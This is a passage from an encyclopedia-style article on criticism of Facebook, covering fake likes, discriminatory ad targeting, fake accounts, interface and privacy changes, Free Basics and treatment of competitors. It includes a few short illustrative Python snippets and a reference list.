Global Fortune 100 firms are increasingly using social media marketing tools, and the number of "likes" per Facebook page has risen by 115% globally.[508] The biotechnology company Comprendia investigated Facebook "likes" gained through advertising by analyzing the life-science pages with the most likes, and concluded that as much as 40% of the "likes" on company pages are suspected to be fake.[509] According to Facebook's annual report, an estimated 0.4% to 1.2% of active users are undesirable accounts that create fake likes.[510]

Small companies such as PubChase have publicly testified against Facebook's advertising tool, claiming that legitimate advertising on Facebook produces fraudulent "likes". In May 2013, PubChase decided to build up its Facebook following through Facebook's advertising tool, which promises to "connect with more of the people who matter to you". After the first day, the company grew suspicious of the increased likes, as it ended up with 900 likes from India; according to PubChase, none of the users behind the "likes" appeared to be scientists, and statistics from Google Analytics indicated that India is not part of the company's main user base. PubChase added that Facebook provides no interface for removing the fake likes; instead, the company must manually delete each follower itself.[511]

In February 2014, Derek Muller used his YouTube account Veritasium to upload a video titled "Facebook Fraud". Within three days, the video had gone viral with more than a million views (it had reached 2,521,614 views as of June 10, 2014). In the video, Muller shows how, after he paid US$50 for Facebook advertising, the "likes" on his fan page tripled in a few days and soon reached 70,000, compared with his original 2,115 likes before the advertising. Despite the significant increase in likes, Muller noticed that engagement on his page actually decreased: fewer people were commenting on, sharing, and liking his posts and updates. Muller also noticed that the users who "liked" his page had liked hundreds of other pages, including competing pages such as AT&T and T-Mobile. He theorizes that these users deliberately click "like" on any and every page to divert attention from the pages they were paid to "like". Muller claims, "I never bought fake likes, I used Facebook legitimate advertising, but the results are as if I paid for fake likes from a click farm".[512]

In response to the fake "likes" complaints, Facebook told Business Insider:

We're always focused on maintaining the integrity of our site, but we've placed an increased focus on abuse from fake accounts recently. We've made a lot of progress by building a combination of automated and manual systems to block accounts used for fraudulent purposes and Like button clicks. We also take action against sellers of fake clicks and help shut them down.[507]

Undesired targeting

On August 3, 2007, several British companies, including First Direct, Vodafone, Virgin Media, The Automobile Association, Halifax, and Prudential, pulled their advertising from Facebook after finding that their ads were displayed on the page of the British National Party, a far-right political party.[513]

Facilitation of housing discrimination

Facebook has faced allegations that its advertising platforms facilitate housing discrimination by means of internal functions for targeted advertising, which allowed advertisers to target or exclude specific audiences from campaigns.[514][515][516] Researchers have also found that Facebook's advertising platform may be inherently discriminatory, since ad delivery is also influenced by how often specific demographics interact with specific types of advertising—even if they are not explicitly determined by the advertiser.[517]

Under the United States' Fair Housing Act, it is illegal to show a preference for or against tenants based on specific protected classes (including race, ethnicity, and disabilities), when advertising or negotiating the rental or sale of housing. In 2016, ProPublica found that advertisers could target or exclude users from advertising based on an "Ethnic Affinity"—a demographic trait which is determined based on a user's interests and behaviors on Facebook, and not explicitly provided by the user. This could, in turn, be used to discriminate based on race.[518] In February 2017, Facebook stated that it would implement stronger measures to forbid discriminatory advertising across the entire platform. Advertisers who attempt to create ads for housing, employment, or credit (HEC) opportunities would be blocked from using ethnic affinities (renamed "multicultural affinities" and now classified as behaviors) to target the ad. If an advertiser uses any other audience segment to target ads for HEC, they would be informed of the policies, and be required to affirm their compliance with relevant laws and policies.[519]
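
The kind of automated gate Facebook described could, in principle, resemble the following check, which rejects housing, employment, or credit ads whose targeting uses a multicultural-affinity segment and otherwise requires the advertiser to affirm compliance. The category names, segment prefix, and ad fields are hypothetical and are not Facebook's actual advertising API.

    # Hypothetical sketch of a compliance gate for housing/employment/credit
    # (HEC) ads: reject targeting specs that use multicultural-affinity
    # segments. All category and field names are illustrative only.

    HEC_CATEGORIES = {"housing", "employment", "credit"}
    RESTRICTED_PREFIX = "multicultural_affinity:"

    def review_ad(ad: dict) -> str:
        """Return a review decision for a single ad submission."""
        targeting = ad.get("included_segments", []) + ad.get("excluded_segments", [])
        uses_restricted = any(s.startswith(RESTRICTED_PREFIX) for s in targeting)
        if ad["category"] in HEC_CATEGORIES and uses_restricted:
            return "rejected: restricted segment used for an HEC ad"
        if ad["category"] in HEC_CATEGORIES:
            return "requires advertiser to affirm compliance with anti-discrimination law"
        return "approved"

    print(review_ad({"category": "housing",
                     "excluded_segments": ["multicultural_affinity:example_segment"]}))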

However, in November 2017, ProPublica found that automated enforcement of these new policies was inconsistent. They were also able to successfully create housing ads that excluded users based on interests and other factors that effectively imply associations with protected classes, including interests in wheelchair ramps, the Spanish-language television network Telemundo, and New York City ZIP codes with majority minority populations. In response to the report, Facebook temporarily disabled the ability to target any ad with exclusions based on multicultural affinities.[514][516]

In April 2018, Facebook permanently removed the ability to create exclusions based on multicultural affinities. In July 2018, Facebook signed a legally binding agreement with the State of Washington to take further steps within 90 days to prevent the use of its advertising platform for housing discrimination against protected classes.[520] The following month, Facebook announced that it would remove at least 5,000 categories from its exclusion system to prevent "misuse", including those relating to races and religions.[521] On March 19, 2019, Facebook settled a lawsuit over the matter with the National Fair Housing Alliance, agreeing to create a separate portal for HEC advertising with limited targeting options by September 2019, and to provide a public archive of all HEC advertising.[522][523]

On March 28, 2019, the U.S. Department of Housing and Urban Development (HUD) filed a lawsuit against Facebook, having filed a formal complaint against the company on August 13, 2018. The HUD also took issue with Facebook's tendency to deliver ads based on users having "particular characteristics [that are] most likely to engage with the ad".[524][515]

Fake accounts

In August 2012, Facebook revealed that more than 83 million Facebook accounts (8.7% of total users) were fake.[525] These fake profiles consist of duplicate profiles, accounts created for spamming purposes, and personal profiles for businesses, organizations, or non-human entities such as pets.[526] As a result of this revelation, Facebook's share price dropped below $20.[527] A considerable body of work has attempted to detect fake profiles by automated means; one such study used machine-learning techniques to identify fake users.[528]
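
As a hedged illustration of the machine-learning approach mentioned in the cited work (not a reproduction of it), a toy classifier over synthetic account features might look like the following, using scikit-learn; real systems rely on far richer behavioral signals.

    # Toy sketch of fake-account detection as a supervised learning problem.
    # The features and labels below are synthetic; real detection systems use
    # far richer signals than these four columns.
    from sklearn.linear_model import LogisticRegression

    # Features per account:
    # [friend_count, posts_per_day, pages_liked_per_day, has_profile_photo]
    X = [
        [250, 1.2, 0.5, 1],   # typical genuine account
        [300, 0.8, 0.3, 1],
        [5, 0.0, 40.0, 0],    # mass-liking account with little activity of its own
        [2, 0.1, 55.0, 0],
    ]
    y = [0, 0, 1, 1]          # 0 = genuine, 1 = fake

    model = LogisticRegression().fit(X, y)
    print(model.predict([[3, 0.0, 60.0, 0]]))  # expected to be flagged as fake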

Facebook initially refused to remove a "business" page devoted to a woman's anus, created without her knowledge while she was underage, because other Facebook users had expressed interest in the topic. After BuzzFeed published a story about it, the page was finally removed. The page listed her family's former home address as that of the "business".[529]

User interface

Upgrades

September 2008

In September 2008, Facebook permanently moved its users to what they termed the "New Facebook" or Facebook 3.0.[530] This version contained several different features and a complete layout redesign. Between July and September, users had been given the option to use the new Facebook in place of the original design,[531] or to return to the old design.

Facebook's decision to migrate its users was met with some controversy in its community. Several groups opposing the decision were formed, some with over a million users.[532]

October 2009

In October 2009, Facebook redesigned the News Feed so that users could view all types of things their friends were involved with. In a statement, Facebook said,

... your applications [stories] generate can show up in both views. The best way for your stories to appear in the News Feed filter is to create stories that are highly engaging, as high quality, interesting stories are most likely to garner likes and comments by the user's friends.[465]

This redesign was explained as:

News Feed will focus on popular content, determined by an algorithm based on interest in that story, including the number of times an item is liked or commented on. Live Feed will display all recent stories from a large number of a user's friends.[465]

The redesign was immediately met with criticism from users, many of whom did not like the amount of information coming at them. The problem was compounded by the fact that users could not select what they saw.
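
A toy version of the popularity-based ranking described in the quoted explanation might look like the sketch below; the weights and story fields are invented for illustration and are not Facebook's actual algorithm.

    # Toy sketch of popularity-based feed ranking: stories with more likes and
    # comments rank higher. Weights and story fields are invented.

    def popularity_score(story: dict) -> float:
        return story["likes"] + 2.0 * story["comments"]

    stories = [
        {"id": "a", "likes": 12, "comments": 1},
        {"id": "b", "likes": 3, "comments": 9},
        {"id": "c", "likes": 40, "comments": 0},
    ]
    news_feed = sorted(stories, key=popularity_score, reverse=True)
    print([s["id"] for s in news_feed])  # ['c', 'b', 'a']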

November/December 2009

In November 2009, Facebook proposed a new privacy policy and adopted it unaltered in December 2009, combining it with a rollout of new privacy settings. The new policy declared certain information, including "lists of friends", to be "publicly available", with no privacy settings; it had previously been possible to restrict access to this information. Because of this change, users who had set their "list of friends" as private had it made public without even being informed, and the option to make it private again was removed. This was protested by many users and by privacy organizations such as the EFF.[533]

The change was described by Ryan Tate as Facebook's Great Betrayal,[534] forcing user profile photos and friends lists to be visible in users' public listings, even for users who had explicitly chosen to hide this information previously,[533] and making photos and personal information public unless users were proactive about limiting access.[535] For example, a user whose "Family and Relationships" information was set to be viewable by "Friends Only" would default to being viewable by "Everyone" (publicly viewable). That is, information such as the gender of the partner the user is interested in, relationship status, and family relations became viewable even to those without a Facebook account. Facebook was heavily criticized[536] for both reducing its users' privacy and pushing users to remove privacy protections. Groups criticizing the changes included the Electronic Frontier Foundation[533] and the American Civil Liberties Union.[537] Facebook CEO Mark Zuckerberg had hundreds of personal photos and his events calendar exposed in the transition.[538] Facebook has since re-included an option to hide friends lists; however, this preference is no longer listed with other privacy settings, and it is no longer possible to hide the friends list from selected people among one's own friends.[539] Journalist Dan Gillmor deleted his Facebook account over the changes, stating he "can't entirely trust Facebook",[540] and Heidi Moore at Slate's Big Money temporarily deactivated her account as a "conscientious objection".[541] Other journalists were similarly disappointed and outraged by the changes.[534] Defending the changes, Zuckerberg said "we decided that these would be the social norms now and we just went for it".[542] The Office of the Privacy Commissioner of Canada launched another investigation into Facebook's privacy policies after complaints following the change.[543]

January 2018

Following a difficult 2017, marked by accusations of relaying fake news and by revelations about groups close to Russia that tried to influence the 2016 US presidential election (see Russian interference in the 2016 United States elections) through advertisements on the service, Mark Zuckerberg announced in his traditional January post:

"We're making a major change to how we build Facebook. I'm changing the goal I give our product teams from focusing on helping you find relevant content to helping you have more meaningful social interactions."

Mark Zuckerberg

Following surveys of Facebook users,[544] this desire for change took the form of a reconfiguration of the News Feed algorithms to:

  • Prioritize content from family members and friends (Mark Zuckerberg, January 12, Facebook:[545] "The first changes you'll see will be in News Feed, where you can expect to see more from your friends, family and groups".)
  • Give priority to news articles from local sources considered more credible

The changes to the News Feed algorithm[545] (see News Feed#History) are expected to improve "the amount of meaningful content viewed".[546] To this end, the new algorithm is supposed to determine the posts around which a user is most likely to interact with friends, and make them appear higher in the News Feed than items from, for example, media companies or brands. These are posts "that inspire back-and-forth discussion in the comments and posts that you might want to share and react to".[547] As even Mark Zuckerberg admitted,[545] he "expect[s] the time people spend on Facebook and some measures of engagement will go down. But I also expect the time you do spend on Facebook will be more valuable". The less public content a Facebook user sees in their News Feed, the less brands are able to reach consumers. That is unarguably a major loss for advertisers[548] and publishers.
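
The reweighting described above, favoring friend, family, and group posts that spark back-and-forth discussion over publisher and brand content, can be caricatured as in the sketch below. The multipliers, source labels, and post fields are invented for illustration and do not reflect Facebook's actual ranking.

    # Caricature of the 2018 "meaningful interactions" change: friend, family
    # and group posts that spark conversation are boosted, page/brand posts
    # are demoted. All multipliers and fields are invented.

    SOURCE_WEIGHT = {"friend": 1.5, "family": 1.5, "group": 1.3, "page": 0.6}

    def meaningful_score(post: dict) -> float:
        base = post["likes"] + 2.0 * post["comments"] + 3.0 * post["reply_threads"]
        return base * SOURCE_WEIGHT.get(post["source"], 1.0)

    posts = [
        {"id": "brand_video", "source": "page", "likes": 120, "comments": 4, "reply_threads": 0},
        {"id": "family_photo", "source": "family", "likes": 30, "comments": 25, "reply_threads": 10},
    ]
    ranked = sorted(posts, key=meaningful_score, reverse=True)
    print([p["id"] for p in ranked])  # the family post now outranks the brand video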

This change, which might seem to be just another update to the social network, has been widely criticized because of the heavy consequences it could have: "In countries such as the Philippines, Myanmar and South Sudan and emerging democracies such [as] Bolivia and Serbia, it is not ethical to plead platform neutrality or to set up the promise of a functioning news ecosystem and then simply withdraw at a whim".[549] In such countries, Facebook held out the promise of a reliable and objective platform from which people could hope to get unfiltered information. Independent media companies tried to fight censorship through their articles and, in a way, promoted citizens' right to know what is going on in their countries.

The company's way of handling scandals and criticism over fake news by playing down its image as a media company has even been called "potentially deadly"[549] in poor and fraught political environments such as Myanmar or South Sudan, which were drawn in by the social network's "Free Basics" programme. Serbian journalist Stevan Dojcinovic goes further, describing Facebook as a "monster" and accusing the company of "showing a cynical lack of concern for how its decisions affect the most vulnerable".[550] Facebook had experimented with removing media companies' news from users' News Feeds in a few countries, such as Serbia. Dojcinovic then wrote an article explaining how Facebook had helped independent outlets "to bypass mainstream channels and bring [their] stories to hundreds of thousands of readers".[550] The rule about publishers is not applied to paid posts, raising the journalist's fear that the social network is "becoming just another playground for the powerful"[550] by letting them, for example, buy Facebook ads. Criticism is also visible at other media companies, some of which depict the private company as a "destroyer of worlds". LittleThings CEO Joe Speiser states that the algorithm shift "took out roughly 75% of LittleThings' organic traffic while hammering its profit margins",[551] compelling the company to shut down because it relied on Facebook to distribute its content.

Net neutrality

"Free basics" controversy in India

In February 2016, the Telecom Regulatory Authority of India (TRAI) ruled against differential data pricing for limited services from mobile phone operators, effectively ending zero-rating platforms in India. Zero rating provides access to a limited number of websites at no charge to the end user. Net-neutrality supporters in India (SaveTheInternet.in) highlighted the negative implications of the Facebook Free Basics program and raised public awareness.[552] Facebook's Free Basics program[553] was a collaboration with Reliance Communications to launch Free Basics in India. The TRAI ruling against differential pricing marked the end of Free Basics in India.[554]

Earlier, Facebook had spent US$44 million on advertising and had implored all of its Indian users to send an email to the Telecom Regulatory Authority in support of its program.[555] TRAI later asked Facebook to provide specific responses from the supporters of Free Basics.[556][557]

Treatment of potential competitors

In December 2018, details emerged about Facebook's behavior toward competitors. UK Member of Parliament Damian Collins released files from a court case between Six4Three and Facebook. According to those files, when the social media company Twitter released its app Vine in 2013, Facebook blocked Vine's access to its data.[558]

In July 2020, Facebook, along with the other tech giants Apple, Amazon, and Google, was accused of wielding harmful market power and using anti-competitive strategies to quash potential competitors.[559] The CEOs of the respective firms appeared before lawmakers of the United States Congress in a teleconference on July 29, 2020.[560]

See also

References

  1. Duncan, Geoff (June 17, 2010). "Open letter urges Facebook to strengthen privacy". Digital Trends. Retrieved June 3, 2017.
  2. Paul, Ian (June 17, 2010). "Advocacy Groups Ask Facebook for More Privacy Changes". PC World. International Data Group. Retrieved June 3, 2017.
  3. Aspen, Maria (February 11, 2008). "How Sticky Is Membership on Facebook? Just Try Breaking Free". The New York Times. Retrieved June 3, 2017.
  4. Anthony, Sebastian (March 19, 2014). "Facebook's facial recognition software is now as accurate as the human brain, but what now?". ExtremeTech. Ziff Davis. Retrieved June 3, 2017.
  5. Gannes, Liz (June 8, 2011). "Facebook facial recognition prompts EU privacy probe". CNET. CBS Interactive. Retrieved June 3, 2017.
  6. Friedman, Matt (March 21, 2013). "Bill to ban companies from asking about job candidates' Facebook accounts is headed to governor". NJ.com. Advance Digital. Retrieved June 3, 2017.
  7. "How Facebook Breeds Jealousy". Seeker. Group Nine Media. February 10, 2010. Retrieved June 3, 2017.
  8. Matyszczyk, Chris (August 11, 2009). "Study: Facebook makes lovers jealous". CNET. CBS Interactive. Retrieved June 3, 2017.
  9. Ngak, Chenda (November 27, 2012). "Facebook may cause stress, study says". CBS News. CBS Interactive. Retrieved June 3, 2017.
  10. Smith, Dave (November 13, 2015). "Quitting Facebook will make you happier and less stressed, study says". Business Insider. Axel Springer SE. Retrieved June 3, 2017.
  11. Bugeja, Michael J. (January 23, 2006). "Facing the Facebook". The Chronicle of Higher Education. Archived from the original on February 20, 2008. Retrieved June 3, 2017.
  12. Hough, Andrew (April 8, 2011). "Student 'addiction' to technology 'similar to drug cravings', study finds". The Telegraph. Telegraph Media Group. Retrieved June 3, 2017.
  13. "Facebook and Twitter 'more addictive than tobacco and alcohol'". The Telegraph. Telegraph Media Group. February 1, 2012. Retrieved June 3, 2017.
  14. Wauters, Robin (September 16, 2010). "Greenpeace Slams Zuckerberg For Making Facebook A "So Coal Network" (Video)". TechCrunch. AOL. Retrieved June 3, 2017.
  15. Neate, Rupert (December 23, 2012). "Facebook paid £2.9m tax on £840m profits made outside US, figures show". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  16. Grinberg, Emanuella (September 18, 2014). "Facebook 'real name' policy stirs questions around identity". CNN. Retrieved June 3, 2017.
  17. Doshi, Vidhi (July 19, 2016). "Facebook under fire for 'censoring' Kashmir-related posts and accounts". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  18. Arrington, Michael (November 22, 2007). "Is Facebook Really Censoring Search When It Suits Them?". TechCrunch. AOL. Retrieved June 3, 2017.
  19. Wong, Julia Carrie (March 18, 2019). "The Cambridge Analytica scandal changed the world – but it didn't change Facebook". The Guardian. Retrieved May 2, 2019.
  20. Greenwald, Glenn; MacAskill, Ewen (June 7, 2013). "NSA Prism program taps in to user data of Apple, Google and others". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  21. Setalvad, Ariha (August 7, 2015). "Why Facebook's video theft problem can't last". The Verge. Vox Media. Retrieved June 3, 2017.
  22. "Facebook, Twitter and Google grilled by MPs over hate speech". BBC News. BBC. March 14, 2017. Retrieved June 3, 2017.
  23. Toor, Amar (September 15, 2015). "Facebook will work with Germany to combat anti-refugee hate speech". The Verge. Vox Media. Retrieved June 3, 2017.
  24. Sherwell, Philip (October 16, 2011). "Cyber anarchists blamed for unleashing a series of Facebook 'rape pages'". The Telegraph. Telegraph Media Group. Retrieved June 3, 2017.
  25. "20,000 Israelis sue Facebook for ignoring Palestinian incitement". The Times of Israel. October 27, 2015. Retrieved June 3, 2017.
  26. "Israel: Facebook's Zuckerberg has blood of slain Israeli teen on his hands". The Times of Israel. July 2, 2016. Retrieved June 3, 2017.
  27. Burke, Samuel (November 19, 2016). "Zuckerberg: Facebook will develop tools to fight fake news". CNN. Retrieved June 3, 2017.
  28. "Hillary Clinton says Facebook 'must prevent fake news from creating a new reality'". The Telegraph. Telegraph Media Group. June 1, 2017. Retrieved June 3, 2017.
  29. Fiegerman, Seth (May 9, 2017). "Facebook's global fight against fake news". CNN. Retrieved June 3, 2017.
  30. Grinberg, Emanuella; Said, Samira (March 22, 2017). "Police: At least 40 people watched teen's sexual assault on Facebook Live". CNN. Retrieved June 3, 2017.
  31. Grinberg, Emanuella (January 5, 2017). "Chicago torture: Facebook Live video leads to 4 arrests". CNN. Retrieved June 3, 2017.
  32. Sulleyman, Aatif (April 27, 2017). "Facebook Live killings: Why the criticism has been harsh". The Independent. Retrieved June 3, 2017.
  33. Farivar, Cyrus (January 7, 2016). "Appeals court upholds deal allowing kids' images in Facebook ads". Ars Technica. Condé Nast. Retrieved June 3, 2017.
  34. Levine, Dan; Oreskovic, Alexei (March 12, 2012). "Yahoo sues Facebook for infringing 10 patents". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  35. Wagner, Kurt (February 1, 2017). "Facebook lost its Oculus lawsuit and has to pay $500 million". Recode. Vox Media. Retrieved June 3, 2017.
  36. Brandom, Rusell (May 19, 2016). "Lawsuit claims Facebook illegally scanned private messages". The Verge. Vox Media. Retrieved June 3, 2017.
  37. Tryhorn, Chris (July 25, 2007). "Facebook in court over ownership". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  38. Michels, Scott (July 20, 2007). "Facebook Founder Accused of Stealing Idea for Site". ABC News. ABC. Retrieved June 3, 2017.
  39. Carlson, Nicholas (March 5, 2010). "How Mark Zuckerberg Hacked Into Rival ConnectU In 2004". Business Insider. Axel Springer SE. Retrieved June 3, 2017.
  40. Arthur, Charles (February 12, 2009). "Facebook paid up to $65m to founder Mark Zuckerberg's ex-classmates". The Guardian. Guardian Media Group. Retrieved June 3, 2017.
  41. Singel, Ryan (April 11, 2011). "Court Tells Winklevoss Twins to Quit Their Facebook Whining". Wired. Condé Nast. Retrieved June 3, 2017.
  42. Stempel, Jonathan (July 22, 2011). "Facebook wins dismissal of second Winklevoss case". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  43. Oweis, Khaled Yacoub (November 23, 2007). "Syria blocks Facebook in Internet crackdown". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  44. Wauters, Robin (July 7, 2009). "China Blocks Access To Twitter, Facebook After Riots". TechCrunch. AOL. Retrieved June 3, 2017.
  45. "Iranian government blocks Facebook access". The Guardian. Guardian Media Group. May 24, 2009. Retrieved June 3, 2017.
  46. Frier, Sarah (August 13, 2019). "Facebook Paid Contractors to Transcribe Users' Audio Chats". Bloomberg News.
  47. "Facebook paid hundreds of contractors to transcribe users' audio". Los Angeles Times. August 13, 2019. Retrieved May 8, 2020.
  48. Haselton, Todd (August 13, 2019). "Facebook hired people to transcribe voice calls made on Messenger". CNBC. Retrieved May 8, 2020.
  49. "A Handy Facebook-to-English Translator | Electronic Frontier Foundation". Eff.org. April 28, 2010. Retrieved June 11, 2013.
  50. "Zuckerberg family pic stirs Facebook privacy debate". CBS News. CBS Interactive. December 27, 2012. Retrieved June 4, 2012.
  51. Hoffman, Harrison (August 12, 2007). "Facebook's source code goes public". CNET News.com.
  52. Richards, Jonathan (August 14, 2007). "Facebook Source Code Leaked Onto Internet". Fox News Channel. Archived from the original on May 29, 2013. Retrieved August 21, 2007.
  53. "Facebook's PHP leak SNAFU". Szinf.com. July 6, 2015. Archived from the original on July 7, 2015. Retrieved July 6, 2015.
  54. Cubrilovic, Nik (August 11, 2007). "Facebook Source Code Leaked". TechCrunch.com.
  55. Ortutay, Barbara (September 21, 2009). "Facebook to end Beacon tracking tool in settlement". USA Today. Retrieved December 8, 2010.
  56. Henry Blodget (December 1, 2007). "NYT: Facebook's Zuckerberg Misled Us; Coke: Ditto - Silicon Alley Insider". Alleyinsider.com. Archived from the original on January 31, 2009. Retrieved June 11, 2013.
  57. Stefan Berteau (November 29, 2007). "Facebook's Misrepresentation of Beacon's Threat to Privacy: Tracking users who opt out or are not logged in". CA Security Advisor Research Blog. Archived from the original on December 17, 2007. Retrieved December 24, 2007.
  58. Stefan Berteau (November 30, 2007). "Update: A Statement From Facebook". CA Security Advisor Research Blog. Archived from the original on November 28, 2010. Retrieved December 8, 2010.
  59. Rosmarin, Rachel (September 5, 2006). "Facebook's Makeover". Forbes. Archived from the original on October 5, 2006. Retrieved April 29, 2015.
  60. "Facebook CEO: 'We Really Messed This One Up'". NBC11.com. September 8, 2006. Archived from the original on January 28, 2007. Retrieved February 21, 2007.
  61. Kirkpatrick, David (2010). The Facebook Effect: The Inside Story of the Company That Is Connecting the World. New York City: Simon & Schuster. p. 191. ISBN 978-1-4391-0211-4.
  62. Jesdanun, Anick (2006). "Facebook offers new privacy options". Associated Press. Archived from the original on December 13, 2010. Retrieved September 8, 2006.
  63. "Making Control Simple". Retrieved December 8, 2010.
  64. "Controlling How You Share". Retrieved December 8, 2010.
  65. "John Lynch & Jenny Ellickson, U.S. Dept. of Justice, Computer Crime and Intellectual Property Section, Obtaining and Using Evidence from Social Networking Sites: Facebook, MySpace, LinkedIn, and more" (PDF). Retrieved June 11, 2013.
  66. Junichi P. Semitsu (2011). "From Facebook to Mug Shot: How the Dearth of Social Networking Privacy Rights Revolutionized Online Government Surveillance". Pace Law Review. 31 (1).
  67. "Rapport over verzoeken tot gegevensverstrekking van internationale overheden". Facebook. Retrieved on September 4, 2013.
  68. "ap.google.com, Canada launches privacy probe into Facebook". Archived from the original on June 3, 2008.
  69. "Privacy Commissioner's Findings in the case of CIPPIC against Facebook" (PDF). Retrieved January 15, 2010.
  70. Jones, Harvey & Soltren, José Hiram (2005). "Facebook: Threats to Privacy" (PDF). Cambridge, Massachusetts: MIT (MIT 6.805/STS085: Ethics and Law on the Electronic Frontier - Fall 2005).
  71. "Facebook Security Response". TheIndyChannel.com. Archived from the original on April 17, 2012. Retrieved December 8, 2010.
  72. Peterson, Chris (February 13, 2006). "Who's Reading Your Facebook?". The Virginia Informer.
  73. "Facebook Privacy Policy". Retrieved December 8, 2010.
  74. Buckley, Christine (August 30, 2007). "Get a life and allow your staff to use Facebook, TUC tells bosses". The Times. London. Retrieved March 5, 2008.
  75. "Facebook Opens Profiles to Public". BBC Online. September 7, 2007.
  76. "Facebook security". BBC. October 24, 2007. Archived from the original on February 20, 2008. Retrieved March 5, 2008.
  77. "Controlling How You Share". Retrieved December 8, 2010.
  78. Aspan, Maria (February 11, 2008). "How Sticky Is Membership on Facebook? Just Try Breaking Free". The New York Times. Retrieved September 23, 2014.
  79. "Information we receive about you". Facebook. Retrieved June 11, 2013.
  80. Lunden, Ingrid (October 13, 2013). "Facebook Buys Mobile Data Analytics Company Onavo, Reportedly For Up To $200M… And (Finally?) Gets Its Office In Israel". TechCrunch.
  81. Morris, Betsy; Seetharaman, Deepa (August 9, 2017). "The New Copycats: How Facebook Squashes Competition From Startups". Wall Street Journal. ISSN 0099-9660. Retrieved August 15, 2017.
  82. "The New Copycats: How Facebook Squashes -2-". Fox Business. August 9, 2017. Retrieved August 15, 2017.
  83. "Facebook knew about Snap's struggles months before the public". Engadget. Retrieved August 15, 2017.
  84. Perez, Sarah. "Facebook is pushing its data-tracking Onavo VPN within its main mobile app". TechCrunch. Retrieved February 14, 2018.
  85. "Facebook's Protect security feature is essentially Spyware". IT PRO. Retrieved February 14, 2018.
  86. "Apple removed Facebook's Onavo from the App Store for gathering app data". TechCrunch. Retrieved August 23, 2018.
  87. "Facebook will pull its data-collecting VPN app from the App Store over privacy concerns". The Verge. Retrieved August 23, 2018.
  88. Grothaus, Michael (August 23, 2018). "Apple makes Facebook pull its spyware(ish) VPN from the App Store". Fast Company. Retrieved September 3, 2018.
  89. Newton, Casey (January 30, 2019). "Facebook will shut down its controversial market research app for iOS". The Verge. Retrieved January 30, 2019.
  90. Constine, John (January 29, 2019). "Facebook pays teens to install VPN that spies on them". TechCrunch. Retrieved January 30, 2019.
  91. Wagner, Kurt (January 30, 2019). "Apple says it's banning Facebook's research app that collects users' personal information". Recode. Retrieved January 30, 2019.
  92. Warren, Tom (January 30, 2019). "Apple blocks Facebook from running its internal iOS apps". The Verge. Retrieved January 30, 2019.
  93. Isaac, Mike (January 31, 2019). "Apple Shows Facebook Who Has the Power in an App Dispute". The New York Times. ISSN 0362-4331. Retrieved February 2, 2019.
  94. Constine, Josh (January 30, 2019). "Senator Warner calls on Zuckerberg to support market research consent rules". TechCrunch. Retrieved January 31, 2019.
  95. Lapowsky, Issie (January 30, 2019). "By Defying Apple's Rules, Facebook Shows It Never Learns". Wired.com. ISSN 1059-1028. Retrieved January 31, 2019.
  96. "Net generation grieves with Facebook postings". News Observer. Archived from the original on August 20, 2007. Retrieved March 5, 2008.
  97. Batista, Sarah (November 21, 2005). "UVA Student Remembered". Charlottesville Newsplex. Archived from the original on January 19, 2008. Retrieved April 10, 2006.
  98. Bernhard, Stephanie (January 25, 2006). "Community mourns death of Pagan '06". Brown Daily Herald. Retrieved April 10, 2006.
  99. Kelleher, Kristina (February 22, 2007). "Facebook profiles become makeshift memorials". The Brown Daily Herald. Archived from the original on March 21, 2008. Retrieved March 5, 2008.
  100. Hortobagyi, Monica (May 8, 2007). "USA Today article". USA Today. Retrieved April 30, 2010.
  101. Drudi, Cassandra (January 5, 2008). "Facebook proves problematic for police". The Globe and Mail. Toronto. Retrieved March 5, 2008.
  102. "Angry Facebook Users Illegally Leaked the Names of Accused Underage Murderers". Digital Journal. January 5, 2008. Retrieved March 5, 2008.
  103. "Defacing Facebook". July 27, 2007. Retrieved August 17, 2007.
  104. Paul, Ian (May 31, 2010). "It's Quit Facebook Day, Are You Leaving? - PCWorld". PC World. Retrieved May 31, 2010.
  105. Woollacott, Emma (May 31, 2010). "Quit Facebook Day set to be a flop". TG Daily. Retrieved May 31, 2010.
  106. Jemima Kiss (June 1, 2010). "Facebook: Did anyone really quit?". Guardian. London.
  107. Stieger, Stefan; Burger, Christoph; Bohn, Manuel; Voracek, Martin (2013). "Who Commits Virtual Identity Suicide? Differences in Privacy Concerns, Internet Addiction, and Personality Between Facebook Users and Quitters". Cyberpsychology, Behavior, and Social Networking. 16 (9): 629–634. doi:10.1089/cyber.2012.0323. PMID 23374170.(subscription required)
  108. "Facebook's facial recognition software is now as accurate as the human brain, but what now? | ExtremeTech". Extremetech.com. Retrieved June 13, 2014.
  109. Facebook Taking Hits Over Facial Recognition Feature. Washington: Atlantic Media, Inc., 2011. ProQuest. Web. December 6, 2016.
  110. "Facebook facial recognition raises eyebrows in Germany, EU". Deutsche Welle. Retrieved June 13, 2011.
  111. Milian, Mark. "Facebook lets users opt out of facial recognition". CNN International. Retrieved June 13, 2011.
  112. Gannes, Liz. "Facebook facial recognition prompts EU privacy probe". Cnet News. Retrieved June 13, 2011.
  113. "Facebook's Facial Recognition Software Is Different From The FBI's. Here's Why". NPR.org. Retrieved December 16, 2018.
  114. Computer, Express. "Facebooks' Mark Zuckerberg: 'we should Not be Afraid of AI'." Express Computer (2016) ProQuest. Web. December 6, 2016.
  115. "Was Facebook über User weiß". Orf.at. November 27, 2011. Retrieved June 11, 2013.
  116. "Sound file" (MP£). Europe-v-facebook.org. Retrieved December 16, 2018.
  117. "An Coimisineir Cosanta Sonrai (Data Protection Commissioner) letter" (PDF). August 24, 2011. Retrieved June 13, 2014.
  118. Drucker, Jesse (October 21, 2010). "Google 2.4% Rate Shows How $60 Billion Lost to Tax Loopholes - Bloomberg". www.bloomberg.com. Retrieved May 21, 2013.
  119. "Facebook's Data Pool". Europe-v-facebook.org.
  120. "Removed content" (PDF). August 22, 2011. Retrieved June 13, 2014.
  121. "Facebook Data Categories" (PDF). April 3, 2012. Retrieved June 13, 2014.
  122. "Legal Procedure against "Facebook Ireland Limited"". Europe-v-facebook.org.
  123. "Facebook won't 'like' its 17th complaint". Irish Examiner. August 27, 2011. Retrieved June 11, 2013.
  124. "Our-Policy.org - Annuity Payments Policies and Regulations". Our-policy.org. Archived from the original on May 25, 2018. Retrieved March 24, 2018.
  125. "Europe versus Facebook". Europe-v-facebook.org. Retrieved June 11, 2013.
